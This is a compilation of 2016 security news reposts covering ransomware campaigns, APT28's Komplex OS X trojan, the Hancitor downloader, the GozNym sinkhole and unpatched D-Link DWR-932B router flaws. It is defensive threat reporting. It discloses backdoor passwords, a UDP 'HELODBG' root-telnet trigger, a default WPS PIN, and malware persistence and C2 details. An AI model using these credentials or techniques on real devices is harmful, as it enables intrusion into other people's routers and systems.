According to the popular cyber security experts an unknown nation state actor may be running tests for taking down the entire internet infrastructure. What happens if someone shuts down the Internet? Is it possible?

Our society heavily depends on technology and the Internet is the privileged vector of the information today. Blocking the Internet could paralyze countless services in almost any industry, from finance to transportation.

Early September the popular cyber security expert Bruce Schneier published an interesting post titled “Someone Is Learning How to Take Down the Internet” that reveals an escalation of cyber attacks against service providers and companies responsible for the basic infrastructure of the Internet.

We are referring to coordinated attacks that experts consider a sort of tests to evaluate the resilience of most critical nodes of the global Internet. The attacks experienced by the companies request a significant effort and huge resources, a circumstance that suggests the involvement of a persistent attacker like a government, and China is the first suspect.

“Recently, some of the major companies that provide the basic infrastructure that makes the Internet work have seen an increase in DDoS attacks against them. Moreover, they have seen a certain profile of attacks. These attacks are significantly larger than the ones they’re used to seeing. They last longer. They’re more sophisticated. And they look like probing.” wrote Schneier.

“I am unable to give details, because these companies spoke with me under a condition of anonymity. But this all is consistent with what Verisign is reporting. Verisign is the registrar for many popular top-level Internet domains, like .com and .net. If it goes down, there’s a global blackout of all websites and e-mail addresses in the most common top-level domains. Every quarter, Verisign publishes a DDoS trends report. While its publication doesn’t have the level of detail I heard from the companies I spoke with, the trends are the same: “in Q2 2016, attacks continued to become more frequent, persistent, and complex.”

It is clear that attackers aim to cause a global blackout of the most common top-level domains paralyzing a large portion of the Internet.

Schneier, who has spoken with companies that faced the attacks, pointed out powerful DDoS attacks that attacks that stand out of the ordinary for their methodically escalating nature.

The attacks start with a certain power that increases as time goes by forcing the victims to deploy all its countermeasures to mitigate the threat.

The report mentioned by Schneier, titled “VERISIGN-OBSERVED DDoS ATTACK TRENDS: Q2 2016” confirms that companies are experiencing a wave of DDoS attacks even more sophisticated.

“DDoS Attacks Become More Sophisticated and Persistent DDoS attacks are a reality for today’s web-reliant organizations. In Q2 2016, DDoS attacks continued to become more frequent, persistent and complex.” states the report.

Schneier also reported other types of attacks against the Internet infrastructure, such as numerous attempts to tamper with Internet addresses and routing.

“One company told me about a variety of probing attacks in addition to the DDoS attacks: testing the ability to manipulate Internet addresses and routes, seeing how long it takes the defenders to respond, and so on. Someone is extensively testing the core defensive capabilities of the companies that provide critical Internet services.” continues Schneier.

Who is behind the attacks?

Schneier believes that the attacks are launched by someone with cyber capabilities of a government, and he seems to exclude the efforts of hacktivists or cyber criminals, and I agree.

“It doesn’t seem like something an activist, criminal, or researcher would do. Profiling core infrastructure is common practice in espionage and intelligence gathering. It’s not normal for companies to do that. Furthermore, the size and scale of these probes — and especially their persistence — points to state actors.” explains Schneier.

The attribution of the attacks is very difficult by data suggests that China is behind them, let me add also that Russia has similar cyber abilities and is able to hide its operations online. Both countries are largely investing in building infrastructures that would be resilient to such kind of mass attacks.

Source:http://securityaffairs.co

KNOWLEDGE BELONGS TO THE WORLD

The post A nation-state actor is testing methods for a massive takedown of the Internet appeared first on Information Security Newspaper.

Ransomware in its various forms continues to make headlines as much for high-profile network disruptions as for the ubiquity of attacks among consumers. We recently noted the non-linear growth of ransomware variants and now a new type has emerged, dubbed MarsJoke.

Proofpoint researchers originally spotted the MarsJoke ransomware in late August [1] by trawling through our repository of unknown malware. However, beginning on September 22, 2016, we detected the first large-scale email campaign distributing MarsJoke. This ongoing campaign appears to target primarily state and local government agencies and educational institutions in the United States.

The targeting of state and local government agencies as well as the distribution methods are very similar to a CryptFile2 campaign we described in August [2]. Gary Warners’s blog also reported on this and similar campaigns, indicating that a well-known botnet, Kelihos, is responsible for distributing this spam [4][5][6].

Email Campaign

On September 22, Proofpoint detected a large MarsJoke ransomware email campaign. Emails contained URLs linking to an executable file named “file_6.exe” hosted on various sites with recently registered domains, apparently for the purpose of supporting this campaign. This is a departure from the much more frequent attached document campaigns we have observed recently with a range of malware, including the widely distributed Locky ransomware. The messages in this campaign used a convincing email body and had a variety of Subject lines referencing a major national air carrier, adding an air of legitimacy to the lures with stolen branding. Subjects included:

• Checking tracking number
• Check your package
• Check your TN
• Check your tracking number
• Tracking information
• Track your package

Figure 1: Email using a convincing lure and fraudulent branding to deliver the malicious ransomware URLs

This campaign is primarily aimed at state and local government agencies, followed by K-12 educational institutions. Messages came through in smaller numbers for healthcare, telecommunications, insurance, and several other verticals.

Figure 2: Vertical targeting by indexed message volume

Analysis

We chose the name for this ransomware based on a string contained within the code: “HelloWorldItsJokeFromMars”. Visually, it mimics the style of CTB-Locker[3], including the helper application displayed to the user and the onion portal.

To alert victims that they are infected and their files are encrypted, this ransomware creates “!!! For Decrypt !!!.bat”, “!!! Readme For Decrypt !!!.txt”, and “ReadMeFilesDecrypt!!!.txt” files sprinkled throughout the victim’s file system, similar to many other types of ransomware.

Figure 3: Ransomware readme files

Encrypted files keep their original extension. Temporary files with “.a19” and “.ap19” file extensions are used during the encryption process but are deleted when the process is finished.

Figure 4: Temporary files used during encryption

The readme file instructs infected users to either follow instructions in the locker window but also have an option to visit an onion portal after installing a Tor browser, where they can receive the same instructions.

Figure 5: MarsJoke text file ransom note contents

The victim’s Desktop background is changed and a dialog pops up presenting the ransom message. This dialog is available in several languages, including English (the default during testing), Russian, Italian, Spanish, and Ukrainian. Victims have 96 hours to submit the ransom of 0.7 BTC (currently 319.98 USD) before files are deleted.

Figure 5: Victim’s Desktop background is changed

The network communication protocol consists of checking in with the command and control (C&C) server to report a new infection, followed by a more verbose check-in reporting various fields such as signature, malware version, etc., transmitting URL-encoded, base64-encoded data.

Figure 6: Malware initial C&C checkin

Figure 7: Malware follow up C&C check-in

Finally, the ransomware provides the user with an onion-hosted web panel with which to interact and get instructions on how to pay the ransom.

Figure 8: Onion-hosted web panel that also provides instructions on how to pay the ransom.

Conclusion

Ransomware has become a billion dollar a year industry for cybercriminals. In the case of the MarsJoke campaign described here, K12 educational institutions and state and local governments are often seen as easy targets because they lack the infrastructure and funding to ensure robust backups and strong defensive resources are in place to prevent and mitigate infections. MarsJoke does not appear to be “just another ransomware,” though. The message volume and targeting associated with this campaign bear further monitoring as attackers look to monetize new variants and old strains saturate potential victims.

Source:https://www.proofpoint.com/

KNOWLEDGE BELONGS TO THE WORLD

The post MarsJoke Ransomware Mimics CTB-Locker appeared first on Information Security Newspaper.

The Sofacy group, also known as APT28, Pawn Storm, Fancy Bear, and Sednit, continues to add to the variety of tools they use in attacks; in this case, targeting individuals in the aerospace industry running the OS X operating system. During our analysis, we determined that Komplex was used in a previous attack campaign targeting individuals running OS X that exploited a vulnerability in the MacKeeper antivirus application to deliver Komplex as a payload. Komplex shares a significant amount of functionality and traits with another tool used by Sofacy – the Carberp variant that Sofacy had used in previous attack campaigns on systems running Windows. In addition to shared code and functionality, we also discovered Komplex command and control (C2) domains that overlapped with previously identified phishing campaign infrastructures associated with the Sofacy group.

Komplex Binder

Komplex is a Trojan that the Sofacy group created to compromise individuals using OS X devices. The Trojan has multiple parts, first leading with a binder component that is responsible for saving a second payload and a decoy document to the system. We found three different versions of the Komplex binder, one that was created to run on x86, another on x64, and a third that contained binders for both x86 and x64 architectures. We found the following samples of the Komplex binder:

Regardless of architecture, these initial binders all save a second embedded Mach-O file to ‘/tmp/content’. This file is the Komplex dropper used in the next stage of installation and to maintain persistence. After saving the Komplex dropper, these binders would then save a legitimate decoy document to the system and open them using the ‘Preview’ application to minimize suspicion of any malicious activity. Figure 1 shows the main function found in one of the initial droppers that saves and opens a PDF decoy, as well as executes another executable file saved as ‘/tmp/content’.

Figure 1 Main function within the Komplex binder

The binder component saves a decoy document named roskosmos_2015-2025.pdf to the system and opens it using the Preview application built into OS X. Figure 2 shows a portion of the 17 page decoy document. This document is titled “Проект Федеральной космической программы России на 2016 – 2025 годы” and describes the Russian Federal Space Program’s projects between 2016 and 2025. We do not have detailed targeting information regarding the  Sofacy group’s attack campaign delivering Komplex at this time; however, based on the contents of the decoy document, we believe that the target is likely associated with the aerospace industry.

Figure 2 Decoy document opened by Komplex binder showing document regarding the Russian Space Program

Komplex Dropper

The Komplex dropper component is saved to the system as “/tmp/content” (SHA256: 96a19a90caa41406b632a2046f3a39b5579fbf730aca2357f84bf23f2cbc1fd3) and is responsible for installing a third executable to the system and setting up persistence for the third executable to launch each time the OS X operating system starts. This dropper also provided the basis for the name “Komplex”, which is seen in several folder paths that were included within the Mach-O file, such as “/Users/kazak/Desktop/Project/komplex”.

The Komplex dropper is fairly straightforward from a functional perspective, as it contains all of its functionality within its “_main” function. The “_main” function (Figure 3) accesses data within three variables named ‘_Payload_1’, ‘_Payload_2’ and ‘_Payload_3’, and writes them to three files on the system.

Figure 3 Komplex Dropper’s main function that drops three files to the system and runs a shell script

The “_main” function writes the data within ‘_Payload_1’, ‘_Payload_2’, and ‘_Payload_3’ variables to the following files, respectively:

1. /Users/Shared/.local/kextd (SHA256:
   227b7fe495ad9951aebf0aae3c317c1ac526cdd255953f111341b0b11be3bbc5)
2. /Users/Shared/com.apple.updates.plist (SHA256:
   1f22e8f489abff004a3c47210a9642798e1c53efc9d6f333a1072af4b11d71ef)
3. /Users/Shared/start.sh (SHA256:
   d494e9f885ad2d6a2686424843142ddc680bb5485414023976b4d15e3b6be800)

The shell script saved to ‘/Users/Shared/start.sh’ calls the system command ‘launchctl’ to add a plist entry into ‘launchd’ to automatically execute the Komplex payload each time the system starts. Figure 4 shows the contents of the ‘start.sh’ script that sets up persistence for the payload.

Figure 4 Contents of the start.sh shell script that calls launchctl

The ‘start.sh’ script loads ‘com.apple.updates.plist’, which sets the properties of the Komplex payload that is executed from “/Users/Shared/.local/kextd” at system start up courtesy of the “RunAtLoad” parameter.  Figure 5 shows the contents of the ‘com.apple.updates.plist’ file loaded into ‘launchd’.

Figure 5 Contents of the com.apple.updates.plist file showing how the dropper achieves persistence

Komplex Payload

The ultimate purpose of the aforementioned components is to install and execute the Komplex payload. The dropper component saves the payload to “/Users/Shared/.local/kextd” (SHA256: 227b7fe495ad9951aebf0aae3c317c1ac526cdd255953f111341b0b11be3bbc5) and ultimately executes the payload. The payload begins by conducting an anti-debugging check to see if it is being debugged before proceeding with executing its main functionality, which can be seen in the “AmIBeingDebugged” function in Figure 6. The “AmIBeingDebugged” function uses the “sysctl” function to check to see if a specific “P_TRACED” flag is set, which signifies that the process is being debugged. A particularly interesting part of this function is that it is very similar to the function provided by Apple to its developers in a guide created in 2004 titled “Detecting the Debugger”. This is not the first time the Sofacy group’s malware authors have obtained techniques from publicly available sources, as demonstrated in the use of the Office Test Persistence Method that they obtained from a blog posted in 2014.

Figure 6 The AmIBeingDebugged function used as an anti-analysis technique

After determining that it is not running in a debugger, the payload performs an anti-analysis/sandbox check by issuing a GET request to Google, to check for Internet connectivity. The payload will sleep until it receives a response from the HTTP requests to Google, which means Komplex will only communicate to its C2 servers in Internet enabled environments. Figure 7 shows the “connectedToInternet” function that confirms whether the payload is able to communicate with “http://www.google.com” before carrying out its functionality.

Figure 7 The connectedToInternet function testing for an active Internet connection

After confirming an active Internet connection, the Komplex payload begins carrying out its main functionality. The Komplex payload uses an 11-byte XOR algorithm to decrypt strings used for configuration and within C2 communications, including the C2 domains themselves. Figure 8 shows a screenshot of Komplex’s custom string decryption algorithm, along with the XOR key used to decrypt strings within the payload.

Figure 8 11-byte XOR algorithm used by Komplex to decrypt configuration strings

The algorithm seen in Figure 8 decrypts the strings seen in Table 1, which the payload references using the associated variable names. The payload uses these decrypted strings for a variety of purposes, such as command parsing and C2 server locations.

Table 1 Strings decrypted by Komplex and their referenced name

The Komplex payload uses the SERVERS variable to obtain the location of its C2, which it communicates with using HTTP POST requests. The payload generates a URL to communicate with its C2 server that has the following structure:

/<random path>/<random string>.<chosen extension>/?<random string>=<encrypted token>

The <chosen extension> portion of the URL is chosen at random from the list of legitimate file extensions: .xml, .zip, .htm and .pdf. The <encrypted token> within the parameters of the URL is base64 encoded ciphertext created from the string ‘h8sn3vq6kl’. The ciphertext of the string is generated via a custom algorithm that uses a random 4-byte integer as a key that is modified by XOR with the static value 0xE150722. The payload also encrypts the data sent within the POST request using the same algorithm and encodes it using base64. Figure 9 below shows an example HTTP POST sent from the payload to its C2 server.

Figure 9 Beacon sent from Komplex to C2 containing system information within the HTTP POST data

The HTTP POST data in Figure 9 is comprised of information that the malware collects from the infected system. The system information sent to the C2 includes data such as the system version, username, and process list, which is gathered within a function named “getOsInfo” within the “InfoOS” class (Figure 10).

Figure 10 getOsInfo function within Komplex that gathers system information for C2 beacon

The Sofacy C2 server will respond to this HTTP request with encrypted data that the payload will decrypt using the same custom algorithm used to encrypt the POST data. The Komplex payload will parse the C2 response for the following strings: “[file]” and “[/file]”, “FileName=”, “PathToSave=”, “Shell=”, “Execute”, and “Delete”. The “Delete” action does nothing more than delete a file specified by ‘PathToSave’/’FileName’, whereas the “Execute” action involves running the following system commands before executing the specified file:

The payload will treat “[file]” and “[/file]” as delimiters that specify the data that the payload should write to a specified file, which allows the threat actor to download additional files to the system. Lastly, the payload can execute commands on the compromised system specified within the “Shell” field, which the payload will execute and then send results back to the C2.

Connections to Sofacy and Previous Attacks.

Code Overlaps

While reverse engineering the Komplex payload, we came across a few code overlaps that we believed were worth exploring. First, we noticed striking similarities between the Komplex payload and the traits and behavior of an OS X Trojan discussed in a BAE Systems blog titled NEW MAC OS MALWARE EXPLOITS MACKEEPER. According to this blog post, an OS X Trojan was delivered via a vulnerability in the MacKeeper application. The nameless OS X Trojan uses an 11-byte XOR algorithm to decrypt an embedded configuration, which has all of the same variable names and values as the Komplex sample (see Table 1). The algorithm used to encrypt and decrypt the network traffic, as well as all static elements of the network communications (composition of URL, structure of HTTP data, command parsing procedure, etc.) discussed in the blog post are the exact same as seen in the Komplex payload. These overlaps suggest that the Trojan delivered by the MacKeeper vulnerability was in fact the Komplex Trojan.

The second code overlap ties the Komplex Trojan to Sofacy’s Carberp variant, which we have analyzed in previous research efforts. Even though Komplex was created to run on OS X and Sofacy’s Carberp variant was developed to run on Windows, they share many commonalities, including:

• Same URL generation logic using random path values, a random file extension and encrypted token
• Same file extensions used in C2 URL that are listed within the binaries in the same order
• Same algorithm used to encrypt and decrypt the token in the URL and HTTP POST data (Carberp key is modified using value 0xAA7D756 whereas Komplex uses 0xE150722)
• Very similar command handling, including parsing specifically for Execute, Delete, [file], [/file], FileName, and PathToSave.
• Checks for Internet connectivity by connecting to google.com
• Uses an 11-byte XOR key to decrypt strings within the configuration

In addition to these common traits, we found a Sofacy Carberp variant (SHA256: 638e7ca68643d4b01432f0ecaaa0495b805cc3cccc17a753b0fa511d94a22bdd) using the same TOKEN value of ‘h8sn3vq6kl’ within its C2 URL, as observed in Komplex payloads. Based on these observations, we believe that the author of Sofacy’s Carberp variant used the same code, or at least the same design, to create the Komplex Trojan. A benefit of retaining many of the same functionalities within the Windows and OS X Trojans is that it would require fewer alterations to the C2 server application to handle cross-platform implants.

Infrastructure Overlap

While Komplex’s C2 domain appleupdate[.]org does not appear to have any previously known activity associated with it, both the apple-iclouds[.]net and itunes-helper[.]net domains have direct ties to Sofacy activity. The apple-iclouds[.]net domain is mentioned within a PwC Tactical Intelligence Bulletin that discussed a phishing campaign conducted by the Sofacy group. The itunes-helper[.]net domain is associated with separate activity discussed in Trend Micro’s blog titled Looking Into a Cyber-Attack Facilitator in the Netherlands that included research on hosting providers used by Pawn Storm (Sofacy).

The domain appleupdate[.]org does have one interesting correlation point, specifically involving the IP 185.10.58[.]170 that resolved this domain between April 2015 through April 2016. Researchers at BAE Systems provided Unit 42 the Komplex payload delivered through the exploitation of MacKeeper (Dropper SHA256: da43d39c749c121e99bba00ce809ca63794df3f704e7ad4077094abde4cf2a73 and Payload SHA256: 45a93e4b9ae5bece0d53a3a9a83186b8975953344d4dfb340e9de0015a247c54), which used the IP address 185.10.58[.]170 within its configuration as a C2 server. This infrastructure overlap further strengthens the connection between the Komplex payload we discovered with the prior campaign using MacKeeper for delivery.

Conclusion

The Sofacy group created the Komplex Trojan to use in attack campaigns targeting the OS X operating system – a move that showcases their continued evolution toward multi-platform attacks. The tool is capable of downloading additional files to the system, executing and deleting files, as well as directly interacting with the system shell. While detailed targeting information is not currently available, we believe Komplex has been used in attacks on individuals related to the aerospace industry, as well as attacks leveraging an exploit in MacKeeper to deliver the Trojan. The Komplex Trojan revealed a design similar to Sofacy’s Carberp variant Trojan, which we believe may have been done in order to handle compromised Windows and OS X systems using the same C2 server application with relative ease.

Source:http://researchcenter.paloaltonetworks.com

KNOWLEDGE BELONGS TO THE WORLD

The post Sofacy’s ‘Komplex’ OS X Trojan appeared first on Information Security Newspaper.

PonyForx is a fork of the more popular Pony infostealer. A crook named Cronbot is currently selling a new malware variant on Russian underground hacking forums that appears to be a successful fork of an older and very advanced infostealer called Pony.

KNOWLEDGE BELONGS TO THE WORLD

The post New PonyForx Infostealer Malware Sold on Russian Hacking Forums appeared first on Information Security Newspaper.

We recently observed Hancitor attacks against some of our FireEye Exploit Guard customers. The malicious document used to deliver the Hancitor executable was observed being distributed as an attachment in email spam. Once downloaded and executed, it drops an intermediate payload that further downloads a Pony DLL and Vawtrak executable, which perform data theft and connect to a command and control (C2) server.

Stage 1: Email Delivery

We observed a number of phishing emails that reference an invoice, as seen in Figure 1. The attachment in these emails is a weaponized Microsoft Office document containing a malicious macro that – when enabled – leads to the download of Hancitor.

Figure 1:  Email with a malicious document attached

Stage 2: Macro and Luring Mechanism

Upon opening the attachment, a typical luring mechanism is employed instructing the victim to enable macros, as seen in Figure 2. FireEye has observed the attackers behind this campaign using three different approaches.

Figure 2:  Luring the victim to enable macros

First Approach

Unlike other malicious macros, this one is not using APIs directly to run the payload. Macros can call APIs directly, but normally are not supposed to run shellcode. The macro used to deliver Hancitor calls the native Windows API, “CallWindowProc”, which can be used to interpret and execute shellcode, as depicted in Figure 3.

Figure 3:  Code within the macro that uses the CallWindowProc API to execute shellcode

Second Approach

Recently, FireEye Exploit Guard captured Hancitor samples that leverage a new API Callback function. In addition to “CallWindowProc”, Hancitor samples may use the function EnumResourceTypesA to interpret and execute shellcode, as seen in Figure 4.

Figure 4:  EnumResourceTypesA API declaration

Third Approach

We also observed a third approach used by a malicious document file to deliver Hancitor. Although the threat actor and command and control servers are similar to the second Hancitor delivery approach, this one uses an alternate tactic to reach its goal of data theft.

With this approach, the luring message shown in the Figure 2 now serves another purpose. Not only does it lure the victim into enabling the macros, but it also is assigned an alternate text: “fkwarning”, as seen in Figure 5. The macro has code to check this attribute to make sure the luring message shape object is present. If this object is not found, the macro will exit without downloading additional payloads.

Figure 5:  Code to ensure that the luring message is intact and the malicious document is executed for the first time

Even if it finds the luring message, it will run the macro once and will delete the shape so that the macro will never be executed again, as seen in Figure 6.

Figure 6: Code to delete the shape that includes the lure message

The malicious macro replaces the deleted image with another that displays the text “network error” to reduce user suspicions, as shown in Figure 7. Note that text is always present in the malicious macro, but it will only be made visible by the macro when it is executing for the first time.

Figure 7: The hidden text that becomes visible once the macro is executed for the first time

The macro then combines fragments of code to make a PowerShell command. However, unlike in the other approaches, the malicious code is not hidden in the code or form or metadata. We observed that the malware extracts malicious code fragments from within the section_header of the embedded image and combines them into a PowerShell command on the fly, as seen in Figure 8. This technique will evade some basic static methods of detection applied to macros macro forms.

Figure 8:  PowerShell command observed in header after increasing font size

The malware authors have taken a very simple but interesting approach to obscure the PowerShell command text. The font size is set to microscopic level 1, as seen in Figure 9. This reduces the likelihood that a casual observer will notice something unusual.

Figure 9:  Minimal font size to hide content of header

Using the “DownloadFile” method, PowerShell obtains a payload from an attacker-controlled website in a ZIP archive format. PowerShell uses the “copyhere” function to unzip the payload. The “.Item” attribute is also set to “16”, which ignores all warnings, as seen in Figure 10.

Figure 10: Code to download archived payload and unzip it

Once the downloaded executable is extracted from the ZIP archive, the macro code deletes the archive using the “Kill” function, as seen in Figure 11. After the executable is executed, it downloads Pony and Vawtrak malware variants to steal data.

Figure 11:  Code to delete the archive

Different Approaches, Same Hancitor

Although there are differences between the second and third approaches to distributing Hancitor, the objective of the threat actor is the same, as we found the same command and control server being used in both approaches.

However, we can see a minor change in the second Hancitor approach command and control servers when compared to the first Hancitor approach command and control servers, with URLs ending with ls5/gate.php instead of ls4/gate.php, as seen in Figure 12.

Figure 12: Earlier and newer Hancitor gates

Stage 3: First stage payload

The file copies itself to “%system32%” and creates a registry run key entry for persistence. Upon execution, it will communicate with an attacker-controller website to download a variant of the Pony malware, “pm.dll” along with a standard Vawtrak trojan.

Stage 4: Second stage payload Pony data exfiltration capabilities

We observed a number of data theft capabilities in the second stage Pony variant, including:

1) Stealing autocomplete Intelliforms data, which may include user passwords, as seen in Figure 13.

Figure 13: Stealing the content of the Intelliforms registry key

2) The unique GUID seen in Figure 14 helps to decrypt credentials from credential store. There is a good amount of documentation on various forums on how to use this salted value to access credentials.

Figure 14: Credential stealing

3) Accessing Mozilla saved passwords from “signons.txt,” as seen in Figure 15.

Figure 15: Accessing Mozilla saved passwords

4) Figure 16 shows the malware code related to theft via accessing Microsoft OMI Email configuration information. We can also see registry entries related to storing Outlook Profile, which contains information about where emails and other data is stored being accessed.

Figure 16:  Malware code for Outlook data theft via registry access

Conclusion

The malware authors responsible for Hancitor have developed several capabilities within malicious macros that support malware installation and data theft. These capabilities include leveraging uncommon APIs and obscuring malicious PowerShell commands, tactics that made detection more challenging.

Source:https://www.fireeye.com/

KNOWLEDGE BELONGS TO THE WORLD

The post HANCITOR DOWNLOADER ABUSING APIS, POWERSHELL COMMANDS appeared first on Information Security Newspaper.

Unlock92 infections going under the radar. A ransomware variant that appeared in early July this year and was initially cracked and decrypted has quietly resurfaced in mid-August and has been spamming users ever since, with a determination seen only in the market’s top ransomware families.

Known as Unlock92, this ransomware was in the media’s attention for a hot second, the time security researchers needed to crack its encryption algorithm and release a free decrypter to help victims recover their files.

While the vast majority of ransomware coders would give up on their code by this point, the Unlock92 team has continued to work on their craft, and returned with new versions, with much stronger encryption, which the free decrypter couldn’t handle.

First (weak) versions of Unlock92 seem to have been an accident

If we look at the big picture, the first Unlock92 version, the one that used weak encryption, seemed to be a fluke. The same gang behind Unlock92 had previously created the Kozy.Jozy ransomware, which used a strong RSA-2048 encryption system to lock the user’s files.

This same RSA-2048 system was later ported to current Unlock92 versions after researchers cracked the first variant. It looks like the first Unlock92 versions were only a test, and used a weaker encryption by accident, or intentionally, with the group fully capable of deploying a much stronger data encryption system at will.

You can easily recognize the first Unlock92 versions based on the CRRRT extension it adds at the end of all encrypted files. The latter variants, the ones that can’t be decrypted, use the LOCKED or CCCRRRPPP extensions.

Files locked by Unlock92 ransomware

MalwareHunterTeam, an independent security researcher that has been keeping an eye on this ransomware since it came out, says the group behind this ransomware is very active, releasing new versions on a regular basis.

“They are very active. Every 1-2 days there’s a new sample,” he said. “The actor(s) behind this have not given up after a few samples like most of skids.”

“Actually, if you don’t count the big ones like Locky, Cerber, CryptXXX, and the ransomware kits, you won’t find much ransomware projects which keep going for months like this,” MalwareHunterTeam added.

Unlock92 targets only Russian-speaking users

The researcher is not the only one that has seen a rise in activity from this ransomware. The Dell Sonicwall Threat Research team has also detected a spike in the number of Unlock92 detections, for which it issued an alert on September 9.

The good news, or good for some of our readers, is that Unlock92 currently targets only Russian-speaking users.

Ransom notes are all available in Russian only. This includes all the TXT files Unlock92 leaves on infected computers, the user’s Desktop and his Start Menu. A rough translation of the Unlock92 ransom note is as follows:

“  Your files are encrypted with RSA- 2048 algorithm cryptographically . If you want to recover them, send one of the encrypted files and keyvalue.bin file to the e-mail address: unlock92@india.com If you do not receive a reply within 24 hours, then download the TOR browser from www.torproject.com and visit the following website: hxxp://ezxxxxxxxxxxxxxx.onion – the most current email address will be listed there. It is not possible to visit this website without a TOR browser. Attempts to self-recover files may irreversibly damage them!  ”

Since there isn’t any geo-targeting filters in Unlock92’s source code, the group behind this threat appears to be using email address batches belonging to Russian users to target their victims. It would take very little effort for the group to translate the ransom notes to English and start targeting users all over the world, without any modification to the ransomware’s source code.

Ransom note files added to the victim’s Start Menu

 Source:http://news.softpedia.com/

KNOWLEDGE BELONGS TO THE WORLD

The post Unlock92 Ransomware Is the Quiet Threat That Nobody Heard About appeared first on Information Security Newspaper.

Today we bring you Princess Locker; the ransomware only royalty could love.  First discovered byMichael Gillespie, Princess Locker encrypts a victim’s data and then demands a hefty ransom amount of 3 bitcoins, or approximately $1,800 USD, to purchase a decryptor. If payment is not made in the specified timeframe, then the ransom payment doubles to 6 bitcoins

Not much is known about Princess Locker other than having seen a few encrypted files and ransom notes uploaded to ID-Ransomware.  From what has been gather gathered, when a person is infected, the ransomware will encrypt the victim’s files and then append a random extension to encrypted files and a unique ID is created for the victim. This ID, extension, and encryption is then most likely sent up to the ransomware’s Command & Control server.

Ransom notes are also created and displayed, which are named!_HOW_TO_RESTORE_[extension].TXT and !_HOW_TO_RESTORE_[extension].html.

These ransom notes contain the victim’s ID and links to the TOR payment sites where a victim can login to see payment information.

The Princess Locker Payment Site

The Princess Locker payment site is your standard ransomware site with no special features. When victim’s access the Princess Locker payment site they will be greeted with a page asking them to select a language that looks almost identical to Cerber’s language selection page.

They will then be presented with a login prompt where they need to enter the victim ID provided in the ransom note.  Once logged in they will see the main payment site, which contains information such as the ransom amount, the bitcoin address to send payment to, and the answers to common questions.

The payment site also provides the ability to decrypt 1 file free. Unfortunately, since we do not have a sample of the ransomware, and I didn’t want to waste a victim’s free decryption, I do not know if this feature works or not.

The one item that is missing from the payment site is a support page that victim’s can use to contact the malware developers.  If this ransomware goes into wider distribution, I would not be surprised to see one added.

We are still actively looking for a sample of this ransomware, so if one is encountered.

Source:http://www.bleepingcomputer.com/

KNOWLEDGE BELONGS TO THE WORLD

The post Introducing Her Royal Highness, the Princess Locker Ransomware appeared first on Information Security Newspaper.

GozNym botnet included over 23,000 infected victims. The Cisco Talos team has announced today that they’ve successfully managed to sinkhole one of GozNym’s botnets and are in the process of doing the same to three others.

Researchers say they were able to divert traffic from the GozNym botnet after they managed to crack the domain name generation algorithm (DGA) used by the banking trojan to communicate with its ever-changing C&C master servers.

All banking trojans today, and other types of top-shelf malware, use DGAs to allow infected hosts to communicate with C&C servers that change on a daily basis.

Cracking the DGA is the quickest way to sinkhole malware operations

A DGA uses various input data to generate a random domain name to which the infected host connects. Because crooks know how the algorithm behaves, they know what domain name is generated every day, and will host servers on those domains in advance, in order to manage the botnet on that specific day.

If researchers manage to crack the DGA, they also know what the algorithm will generate, and can take over those domains from crooks, with the help of law enforcement, domain registrars, and hosting providers.

Something similar happened in July when researchers from Arbor Networks cracked the DGA of the Mad Max malware and sinkholed all the C&C servers it was bound to use until the end of the year, effectively taking down the botnet.

GozNym shined bright like a falling star

GozNym is a new banking trojan that appeared this year in April and is a hybrid malware family made up of code taken from the Gozi and Nymaim trojans.

The trojan established itself as a threat from the get-go, with a diverse arsenal of tools and tricks which included support for both webinjects (browser and application process injection) and redirection attacks (malicious proxy redirecting users to fake banking sites). This is something out of the ordinary, with very few banking trojans using both methods at once, usually opting just for one.

Besides being highly complex, code-wise, the trojan was also backed by vicious spam campaigns that spread their payload all over Japan, Europe, and North America.

Development on the trojan was so far ahead of other similar malware that in August, buguroo detected some features in GozNym’s code to bypass some types of behavioral biometrics defenses found on some modern banking portals.

According to data gathered from the first sinkholed botnet, Cisco says it detected 23,062 infected hosts so far, with most of them located in Germany, the US, Poland, Canada, and the UK, all classic GozNym targets.

GozNym botnet analysis (by IP per country)

 Source:http://news.softpedia.com/

KNOWLEDGE BELONGS TO THE WORLD

The post Cisco Sinkholes GozNym Banking Trojan Botnet appeared first on Information Security Newspaper.

Security researchers have discovered numerous unpatched security vulnerabilities in the D-Link DWR-932B LTE router / access point, including backdoor accounts and default Wi-Fi Protected Setup (WPS) PIN.

The device is being sold in various countries and appears to be customers’ security nightmare because of the numerous security weaknesses. The vulnerabilities were discovered by Pierre Kim, who decided to reveal only the most significant of them, and who says that the issues affect even the latest firmware version released by the vendor.

Earlier this year, Kim disclosed numerous unpatched vulnerabilities affecting the LTE QDH routers made by Quanta, including backdoors, hardcoded PIN, flaws in the web interface, remote code execution issue, and other bugs. The flaws that impact D-Link’s router are similar to those found in Quanta’s device, it seems.

The researcher discovered two backdoor accounts on the device and says that they can be used to bypass the HTTP authentication used to manage the router. There is an “admin” account with password “admin,” as well as a “root” account, with password “1234.” By default, telnetd and SSHd are running on D-Link DWR-932B, yet the latter isn’t documented, the researcher also explains.

Next, there is a backdoor inside the /bin/appmgr program, which allows an attacker to send a specific string in UDP to the router to start an authentication-less telnet server (if a telnetd daemon is not already running). The issue is that the router listens to 0.0.0.0:39889 (UDP) for commands and that it allows access without authentication as root if “HELODBG” is received as command.

D-Link DWR-932B also comes with 28296607 as the default WPS PIN, and has it hardcoded in the /bin/appmgr program. The HostAP configuration contains the PIN as well, and so do the HTTP APIs. What’s more, although the router allows the user to generate a temp PIN for the WPS system, the PIN is weak and uses an algorithm leveraging srand(time(0)) as seed. An attacker knowing the current date as time(0) can generate valid WPS PIN suites and brute-force them, the researcher explains.

Kim also reveals that the file /etc/inadyn-mt.conf contains a user and a hardcoded password, and that the HTTP daemon /bin/qmiweb contains multiple vulnerabilities as well. The router also executes strange, purposeless shell commands as root.

Furthermore, the router supports remote FOTA (Firmware Over The Air) and contains the credentials to contact the server hardcoded in the /sbin/fotad binary, as base64-strings. The researcher discovered that, although the FOTA daemon tries to retrieve the firmware over HTTPS, the SSL certificate has been invalid for one year and a half.

The researcher also reveals that the security level of the UPNP program (miniupnp) in the router is lowered, which allows an attacker located in the LAN area to add Port forwarding from the Internet to other clients located in the LAN. “There is no restriction about the UPnP permission rules in the configuration file, contrary to common usage in UPnP where it is advised to only allow redirection of port above 1024,” Kim notes.

Because of this lack of permission rules, an attacker can forward everything from the WAN into the LAN, the researcher says. This means that they can set rules to allow traffic from the Internet to local Exchange servers, mail servers, FTP servers, HTTP servers, database servers, and the like.

